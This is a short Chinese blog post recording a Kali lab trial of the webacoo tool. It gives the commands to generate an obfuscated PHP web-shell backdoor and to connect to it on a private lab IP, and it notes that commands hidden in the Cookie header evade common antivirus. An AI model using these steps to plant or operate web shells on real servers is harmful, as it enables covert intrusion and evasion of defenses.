2018-11-08 webacoo小试记录(kali)

本文介绍了一种通过Cookie头传输编码通信内容的隐蔽方法,用于获取类终端的shell,且不易被一般杀软检测。文中详细解释了如何使用webacoo工具生成及连接加密混淆的一句话木马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一. 简介:

获取的是类终端的shell。编码通信内容通过cookie头传输,隐蔽性较强。亲测不会被一般的杀软查杀,企业级的杀软没有测试。

参数:      查看帮助:webacoo -h

二. 使用记录:

webacoo -g -o webacoo.php      (创建加密混淆的一句话木马,-g参数生成后门代码,-o参数输出为一个文件。)​

 
12321111-f181bd8d841a9306
 

至于如何上传到服务器本地不在此赘述了。

webacoo -t -u http://192.168.56.101/webacoo.php     (连接一句话木马,-t参数指定进行客户端的连接,-u参数指定目标URL。)

 
12321111-8e1b78a59c380d39
 

##抓包分析如何通过cookie头传指令,手动触发流量  【cm/cn/cp】

 
12321111-b42a6c76d9a5413d
 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值